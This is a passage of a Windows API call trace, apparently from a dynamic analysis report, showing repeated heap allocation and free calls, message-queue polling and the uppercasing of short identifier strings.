Size=0x10) returned 0x2aa9a48 [0087.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0087.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0087.089] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0087.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0087.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0087.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0087.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0087.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0087.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0087.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0087.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0087.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0087.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0087.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0087.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0087.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.135] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0087.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0087.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0087.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0087.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0087.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0087.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0087.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0087.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.136] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0087.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0087.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0087.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0087.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0087.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0087.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0087.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.140] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0087.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0087.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0087.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0087.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0087.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0087.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0087.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0087.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.141] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0087.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0087.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0087.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0087.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0087.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0087.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0087.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.142] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0087.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0087.142] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0087.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0087.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0087.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.142] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0087.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0087.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0087.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0087.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0087.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0087.142] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0087.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0087.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0087.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0087.142] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0087.143] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0087.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0087.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0087.143] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0087.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0087.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0087.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74430 [0087.143] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0087.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0087.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0087.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0087.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0087.143] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0087.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0087.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0087.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0087.143] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0087.144] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0087.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0087.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0087.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0087.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74430 | out: hHeap=0x2af0000) returned 1 [0087.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0087.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0087.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0087.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0087.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0087.145] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0087.145] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0087.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0087.145] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0087.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0087.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0087.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74868 [0087.145] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0087.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0087.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0087.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0087.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0087.145] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0087.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0087.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0087.145] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0087.146] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0087.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0087.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 